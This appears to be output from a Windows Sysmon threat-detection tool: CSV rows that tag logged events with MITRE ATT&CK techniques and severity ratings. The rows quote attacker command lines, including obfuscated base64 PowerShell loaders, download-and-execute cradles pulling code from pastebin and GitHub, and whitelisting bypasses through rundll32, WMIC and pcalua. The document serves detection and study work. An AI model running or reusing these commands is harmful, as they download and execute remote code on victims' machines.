([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('JFhYPUlFWCgoJ1snICsgW2NoYXJdMHg1MyArICd5c3RlbS5UZXh0LkVuYycgKyBbY2hhcl0weDZmICsgJ2RpbmddOjpBJyArIFtjaGFyXTB4NTMgKyAnQ0lJLkdldCcgKyBbY2hhcl0weDUzICsgJ3RyaW5nKFsnICsgW2NoYXJdMHg1MyArICd5c3RlbS5DJyArIFtjaGFyXTB4NmYgKyAnbnZlcnRdOjpGcicgKyBbY2hhcl0weDZmICsgJ21CYXNlNicgKyBbY2hhcl0weDM0ICsgJycgKyBbY2hhcl0weDUzICsgJ3RyaW5nKChnZXQtYycgKyBbY2hhcl0weDZmICsgJ250ZW50IC1wYXRoICcnYzpcd2luZCcgKyBbY2hhcl0weDZmICsgJ3dzXHRlbXBccGljdHVyZS5qcGcnJykpKScpKTskQkI9SUVYKCgnc3RhcnQtc2xlZXAgMTA7JHM9JFhYOyRkID0gQCgpOyR2ID0gMDskYyA9IDA7d2hpbGUoJGMgLW5lICRzLmxlbmd0aCl7JHY9KCR2KjUyKSsoW0ludDMyXVtjaGFyXSRzWyRjXS0nICsgW2NoYXJdMHgzNCArICcwKTtpZigoKCRjKzEpJTMpIC1lcSAwKXt3aGlsZSgkdiAtbmUgMCl7JHZ2PSR2JTI1NjtpZigkdnYgLWd0IDApeyRkKz1bY2hhcl1bSW50MzJdJHZ2fSR2PVtJbnQzMl0oJHYvMjU2KX19JGMrPTE7fTtbYXJyYXldOjpSZXZlcnNlKCRkKTtJRVgoWycgKyBbY2hhcl0weDUzICsgJ3RyaW5nXTo6SicgKyBbY2hhcl0weDZmICsgJ2luKCcnJycsJGQpKTs7JykpO0lFWCgkQkIp')))""" C:\Windows\system32\ MSEDGEWIN10\IEUser 747F3D96-F419-5D53-0000-002026910200 0x29126 1 Medium SHA1=267D05CE8D10D97620BE1C7773757668BAEB19EE,MD5=F5E5DF6C9D62F4E940B334954A2046FC,SHA256=47CACD60D91441137D055184614B1A418C0457992977857A76CA05C75BBC1B56,IMPHASH=0F71D5F6F4CBB935CE1B09754102419C 747F3D96-FBCA-5D53-0000-0010B8664100 2476 C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" zipfldr.dll,RouteTheCall shell:::{769f9427-3cc6-4b62-be14-2a705115b7ab} ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1558920557.811477,2019-05-27T05:29:17.811477+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( "C:\Windows\System32\inetsrv\appcmd.exe" list apppool /text:processmodel.username ),1," 1 5 4 1 0 0x8000000000000000 5901 Microsoft-Windows-Sysmon/Operational IEWIN7 2019-05-27 01:29:17.771 365ABB72-3D6D-5CEB-0000-00100478FF00 3444 C:\Windows\System32\inetsrv\appcmd.exe 7.5.7600.16385 (win7_rtm.090713-1255) Application Server Command Line Admin Tool Internet Information Services Microsoft Corporation "C:\Windows\System32\inetsrv\appcmd.exe" list apppool /text:processmodel.username C:\Windows\Temp\ IIS APPPOOL\DefaultAppPool 365ABB72-B26B-5CEA-0000-002023240800 0x82423 0 High SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45 365ABB72-3D4A-5CEB-0000-0010FA93FD00 2584 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== ",IEWIN7,Microsoft-Windows-Sysmon/Operational [T1047] Windows Management Instrumentation - Process,1558969974.632117,2019-05-27T19:12:54.632117+04:00,,Threat,High,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\wbem\WMIC.exe ) through command line ( C:\Windows\system32\wbem\wmic.exe process call create \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe ),1," 1 5 4 1 0 0x8000000000000000 6190 Microsoft-Windows-Sysmon/Operational IEWIN7 2019-05-27 15:12:54.515 365ABB72-FE76-5CEB-0000-001077710C00 2840 C:\Windows\System32\wbem\WMIC.exe 6.1.7600.16385 (win7_rtm.090713-1255) WMI Commandline Utility Microsoft® Windows® Operating System Microsoft Corporation C:\Windows\system32\wbem\wmic.exe process call create \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe C:\Windows\system32\ NT AUTHORITY\SYSTEM 365ABB72-7B40-5CEC-0000-0020E7030000 0x3e7 0 System SHA1=4368DBD172224EC9461364BE1AC9DFFC5D9224A8,MD5=A03CF3838775E0801A0894C8BACD2E56,SHA256=132AA270790F56A7524CAB968927ED5E1D91B9A26D4BADCB24E450E7DECC5F81,IMPHASH=B59AF26B08AA14BA66272388BC9C2443 365ABB72-FE76-5CEB-0000-0010546E0C00 2356 C:\Windows\System32\cmd.exe cmd.exe /c %SYSTEMROOT%\system32\wbem\wmic.exe process call create \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe ",IEWIN7,Microsoft-Windows-Sysmon/Operational [ T1086 ] Powershell with Suspicious Argument,1564436004.104732,2019-07-30T01:33:24.104732+04:00,,Threat,Critical,"Found User (MSEDGEWIN10\IEUser) run Suspicious PowerShell commands that include (|, -c ,.Download,.DownloadFile(,Net.WebClient,powershell,.txt,|, -c ,.Download,.DownloadFile(,Net.WebClient,powershell,.txt) in event with Command Line (powershell -c "(New-Object Net.WebClient).DownloadFile('https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_})))") and Parent Image :C:\Windows\System32\cmd.exe , Parent CommandLine (cmd /c powershell -c "(New-Object Net.WebClient).DownloadFile('https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_})))") in directory : ( C:\Windows\system32\ )",1," 1 5 4 1 0 0x8000000000000000 4912 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-29 21:33:23.380 747F3D96-6623-5D3F-0000-0010BC068800 3000 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 10.0.17763.1 (WinBuild.160101.0800) Windows PowerShell Microsoft® Windows® Operating System Microsoft Corporation powershell -c "(New-Object Net.WebClient).DownloadFile('https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_})))" C:\Windows\system32\ MSEDGEWIN10\IEUser 747F3D96-6053-5D3F-0000-002082314100 0x413182 1 High SHA1=6CBCE4A295C163791B60FC23D285E6D84F28EE4C,MD5=7353F60B1739074EB17C5F4DDDEFE239,SHA256=DE96A6E69944335375DC1AC238336066889D9FFC7D73628EF4FE1B1B160AB32C,IMPHASH=741776AACCFC5B71FF59832DCDCACE0F 747F3D96-6623-5D3F-0000-001011F68700 5816 C:\Windows\System32\cmd.exe cmd /c powershell -c "(New-Object Net.WebClient).DownloadFile('https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_})))" ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1202] Indirect Command Execution,1557680511.00795,2019-05-12T21:01:51.007950+04:00,,Threat,Medium,Found User (IEWIN7\IEUser) through process name (C:\Windows\System32\pcalua.exe) tried accessing powershell history through commandline ( "C:\Windows\System32\pcalua.exe" -a c:\Windows\system32\calc.exe ),1," 1 5 4 1 0 0x8000000000000000 16497 Microsoft-Windows-Sysmon/Operational IEWIN7 2019-05-12 17:01:50.781 365ABB72-517E-5CD8-0000-001024D61700 2952 C:\Windows\System32\pcalua.exe 6.1.7600.16385 (win7_rtm.090713-1255) Program Compatibility Assistant Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\System32\pcalua.exe" -a c:\Windows\system32\calc.exe C:\Users\IEUser\ IEWIN7\IEUser 365ABB72-4FB5-5CD8-0000-0020F2350100 0x135f2 1 Medium SHA1=ABB6319976D9702E0C80978D51C0AEE88A33D201,MD5=D652BA887500816431566B524292ECCB,SHA256=65446AF2997779DB6CDAEFB2ABC2994CA9F2A2477C882BC3A5F828BBFFB83CEE,IMPHASH=256CD8CEDFD4FCB3BC9DB32E27E5923A 365ABB72-516B-5CD8-0000-001087E41600 3788 C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" ",IEWIN7,Microsoft-Windows-Sysmon/Operational [T1086] PowerShell Process found,1564436004.104732,2019-07-30T01:33:24.104732+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ) through command line ( powershell -c "(New-Object Net.WebClient).DownloadFile('https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_})))" )",1," 1 5 4 1 0 0x8000000000000000 4912 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-29 21:33:23.380 747F3D96-6623-5D3F-0000-0010BC068800 3000 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 10.0.17763.1 (WinBuild.160101.0800) Windows PowerShell Microsoft® Windows® Operating System Microsoft Corporation powershell -c "(New-Object Net.WebClient).DownloadFile('https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_})))" C:\Windows\system32\ MSEDGEWIN10\IEUser 747F3D96-6053-5D3F-0000-002082314100 0x413182 1 High SHA1=6CBCE4A295C163791B60FC23D285E6D84F28EE4C,MD5=7353F60B1739074EB17C5F4DDDEFE239,SHA256=DE96A6E69944335375DC1AC238336066889D9FFC7D73628EF4FE1B1B160AB32C,IMPHASH=741776AACCFC5B71FF59832DCDCACE0F 747F3D96-6623-5D3F-0000-001011F68700 5816 C:\Windows\System32\cmd.exe cmd /c powershell -c "(New-Object Net.WebClient).DownloadFile('https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_})))" ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1564126781.211276,2019-07-26T11:39:41.211276+04:00,,Threat,Low,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\System32\cmd.exe" /c copy /Y C:\Windows\system32\rundll32.exe %%TEMP%%\out.exe > nul && %%TEMP%%\out.exe javascript:"\..\mshtml RunHTMLApplication ";document.write();h=new%%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","http://pastebin.com/raw/y2CjnRtH",false);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im out.exe",0,true);} )",1," 1 5 4 1 0 0x8000000000000000 4353 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-26 07:39:14.853 747F3D96-AE22-5D3A-0000-001004D84E00 5548 C:\Windows\System32\cmd.exe 10.0.17763.1 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\System32\cmd.exe" /c copy /Y C:\Windows\system32\rundll32.exe %%TEMP%%\out.exe > nul && %%TEMP%%\out.exe javascript:"\..\mshtml RunHTMLApplication ";document.write();h=new%%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","http://pastebin.com/raw/y2CjnRtH",false);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im out.exe",0,true);} C:\Users\IEUser\Desktop\ MSEDGEWIN10\IEUser 747F3D96-ABD5-5D3A-0000-0020EB990F00 0xf99eb 1 Medium SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-AE22-5D3A-0000-001096B24E00 1504 C:\Windows\hh.exe "C:\Windows\hh.exe" C:\Users\IEUser\Desktop\Fax Record N104F.chm ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1074] Data Staged - Process,1564436004.104732,2019-07-30T01:33:24.104732+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ) through command line ( powershell -c "(New-Object Net.WebClient).DownloadFile('https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_})))" )",1," 1 5 4 1 0 0x8000000000000000 4912 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-29 21:33:23.380 747F3D96-6623-5D3F-0000-0010BC068800 3000 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 10.0.17763.1 (WinBuild.160101.0800) Windows PowerShell Microsoft® Windows® Operating System Microsoft Corporation powershell -c "(New-Object Net.WebClient).DownloadFile('https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_})))" C:\Windows\system32\ MSEDGEWIN10\IEUser 747F3D96-6053-5D3F-0000-002082314100 0x413182 1 High SHA1=6CBCE4A295C163791B60FC23D285E6D84F28EE4C,MD5=7353F60B1739074EB17C5F4DDDEFE239,SHA256=DE96A6E69944335375DC1AC238336066889D9FFC7D73628EF4FE1B1B160AB32C,IMPHASH=741776AACCFC5B71FF59832DCDCACE0F 747F3D96-6623-5D3F-0000-001011F68700 5816 C:\Windows\System32\cmd.exe cmd /c powershell -c "(New-Object Net.WebClient).DownloadFile('https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_})))" ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1117] Bypassing Application Whitelisting,1557668280.712733,2019-05-12T17:38:00.712733+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32.exe url.dll,FileProtocolHandler file:///C:/programdata/calc.hta)",1," 1 5 4 1 0 0x8000000000000000 16395 Microsoft-Windows-Sysmon/Operational IEWIN7 2019-05-12 13:38:00.523 365ABB72-21B8-5CD8-0000-0010BADE2600 3856 C:\Windows\System32\rundll32.exe 6.1.7600.16385 (win7_rtm.090713-1255) Windows host process (Rundll32) Microsoft® Windows® Operating System Microsoft Corporation rundll32.exe url.dll,FileProtocolHandler file:///C:/programdata/calc.hta c:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\ IEWIN7\IEUser 365ABB72-1596-5CD8-0000-0020103A0100 0x13a10 1 High SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238 365ABB72-2006-5CD8-0000-0010E0912300 2936 C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" ",IEWIN7,Microsoft-Windows-Sysmon/Operational "[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1557668280.712733,2019-05-12T17:38:00.712733+04:00,,Threat,High,"Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32.exe url.dll,FileProtocolHandler file:///C:/programdata/calc.hta )",1," 1 5 4 1 0 0x8000000000000000 16395 Microsoft-Windows-Sysmon/Operational IEWIN7 2019-05-12 13:38:00.523 365ABB72-21B8-5CD8-0000-0010BADE2600 3856 C:\Windows\System32\rundll32.exe 6.1.7600.16385 (win7_rtm.090713-1255) Windows host process (Rundll32) Microsoft® Windows® Operating System Microsoft Corporation rundll32.exe url.dll,FileProtocolHandler file:///C:/programdata/calc.hta c:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\ IEWIN7\IEUser 365ABB72-1596-5CD8-0000-0020103A0100 0x13a10 1 High SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238 365ABB72-2006-5CD8-0000-0010E0912300 2936 C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" ",IEWIN7,Microsoft-Windows-Sysmon/Operational [T1085] Rundll32 Execution detected,1557668280.712733,2019-05-12T17:38:00.712733+04:00,,Threat,High,"Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32.exe url.dll,FileProtocolHandler file:///C:/programdata/calc.hta )",1," 1 5 4 1 0 0x8000000000000000 16395 Microsoft-Windows-Sysmon/Operational IEWIN7 2019-05-12 13:38:00.523 365ABB72-21B8-5CD8-0000-0010BADE2600 3856 C:\Windows\System32\rundll32.exe 6.1.7600.16385 (win7_rtm.090713-1255) Windows host process (Rundll32) Microsoft® Windows® Operating System Microsoft Corporation rundll32.exe url.dll,FileProtocolHandler file:///C:/programdata/calc.hta c:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\ IEWIN7\IEUser 365ABB72-1596-5CD8-0000-0020103A0100 0x13a10 1 High SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238 365ABB72-2006-5CD8-0000-0010E0912300 2936 C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" ",IEWIN7,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1553028075.144276,2019-03-20T00:41:15.144276+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe ),1," 1 5 4 1 0 0x8000000000000000 1966251 Microsoft-Windows-Sysmon/Operational PC01.example.corp 2019-03-19 20:36:04.206 365ABB72-52B4-5C91-0000-0010355B0100 1628 C:\Windows\System32\cmd.exe 6.1.7601.17514 (win7sp1_rtm.101119-1850) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation cmd.exe C:\Windows\system32\ NT AUTHORITY\SYSTEM 365ABB72-528D-5C91-0000-0020E7030000 0x3e7 0 System MD5=AD7B9C14083B52BC532FBA5948342B98,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163 365ABB72-528D-5C91-0000-001062560000 484 C:\Windows\System32\services.exe C:\Windows\system32\services.exe ",PC01.example.corp,Microsoft-Windows-Sysmon/Operational [T1117] Bypassing Application Whitelisting,1602935016.312645,2020-10-17T15:43:36.312645+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\SysWOW64\rundll32.exe) with commandline ( "C:\Windows\System32\rundll32.exe")",1," 1 5 4 1 0 0x8000000000000000 417079 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2020-10-17 11:43:36.303 747F3D96-D8E8-5F8A-0000-00102CEF7200 840 C:\Windows\SysWOW64\rundll32.exe 10.0.17763.1 (WinBuild.160101.0800) Windows host process (Rundll32) Microsoft® Windows® Operating System Microsoft Corporation RUNDLL32.EXE "C:\Windows\System32\rundll32.exe" C:\Users\IEUser\AppData\Roaming\ MSEDGEWIN10\IEUser 747F3D96-CA8D-5F8A-0000-0020D1090A00 0xa09d1 1 High SHA1=6778DAD71C8B06264CF2929A5242D2612D3EB026,MD5=2F633406BC9875AA48D6CC5884B70862,SHA256=26E68D4381774A6FD0BF5CA2EACEF55F2AB28536E3176A1C6362DFFC68B22B8A,IMPHASH=BB17B2FBBFF4BBF5EBDCA7D0BB9E4A5B 747F3D96-D8E5-5F8A-0000-0010E1BC7200 2920 C:\Users\IEUser\AppData\Roaming\WINWORD.exe C:\Users\IEUser\AppData\Roaming\WINWORD.exe --xStart ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1117] Bypassing Application Whitelisting,1565785034.89393,2019-08-14T16:17:14.893930+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( "C:\Windows\system32\rundll32.exe" zipfldr.dll,RouteTheCall shell:::{769f9427-3cc6-4b62-be14-2a705115b7ab})",1," 1 5 4 1 0 0x8000000000000000 10674 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-08-14 12:17:14.447 747F3D96-FBCA-5D53-0000-0010B8664100 2476 C:\Windows\System32\rundll32.exe 10.0.17763.1 (WinBuild.160101.0800) Windows host process (Rundll32) Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\system32\rundll32.exe" zipfldr.dll,RouteTheCall shell:::{769f9427-3cc6-4b62-be14-2a705115b7ab} C:\Windows\system32\ MSEDGEWIN10\IEUser 747F3D96-F419-5D53-0000-002026910200 0x29126 1 Medium SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A 747F3D96-F41E-5D53-0000-001067C80300 4824 C:\Windows\explorer.exe C:\Windows\Explorer.EXE ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational "[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1602935016.312645,2020-10-17T15:43:36.312645+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\SysWOW64\rundll32.exe ) through command line ( "C:\Windows\System32\rundll32.exe" ),1," 1 5 4 1 0 0x8000000000000000 417079 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2020-10-17 11:43:36.303 747F3D96-D8E8-5F8A-0000-00102CEF7200 840 C:\Windows\SysWOW64\rundll32.exe 10.0.17763.1 (WinBuild.160101.0800) Windows host process (Rundll32) Microsoft® Windows® Operating System Microsoft Corporation RUNDLL32.EXE "C:\Windows\System32\rundll32.exe" C:\Users\IEUser\AppData\Roaming\ MSEDGEWIN10\IEUser 747F3D96-CA8D-5F8A-0000-0020D1090A00 0xa09d1 1 High SHA1=6778DAD71C8B06264CF2929A5242D2612D3EB026,MD5=2F633406BC9875AA48D6CC5884B70862,SHA256=26E68D4381774A6FD0BF5CA2EACEF55F2AB28536E3176A1C6362DFFC68B22B8A,IMPHASH=BB17B2FBBFF4BBF5EBDCA7D0BB9E4A5B 747F3D96-D8E5-5F8A-0000-0010E1BC7200 2920 C:\Users\IEUser\AppData\Roaming\WINWORD.exe C:\Users\IEUser\AppData\Roaming\WINWORD.exe --xStart ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational "[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1565785034.89393,2019-08-14T16:17:14.893930+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( "C:\Windows\system32\rundll32.exe" zipfldr.dll,RouteTheCall shell:::{769f9427-3cc6-4b62-be14-2a705115b7ab} )",1," 1 5 4 1 0 0x8000000000000000 10674 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-08-14 12:17:14.447 747F3D96-FBCA-5D53-0000-0010B8664100 2476 C:\Windows\System32\rundll32.exe 10.0.17763.1 (WinBuild.160101.0800) Windows host process (Rundll32) Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\system32\rundll32.exe" zipfldr.dll,RouteTheCall shell:::{769f9427-3cc6-4b62-be14-2a705115b7ab} C:\Windows\system32\ MSEDGEWIN10\IEUser 747F3D96-F419-5D53-0000-002026910200 0x29126 1 Medium 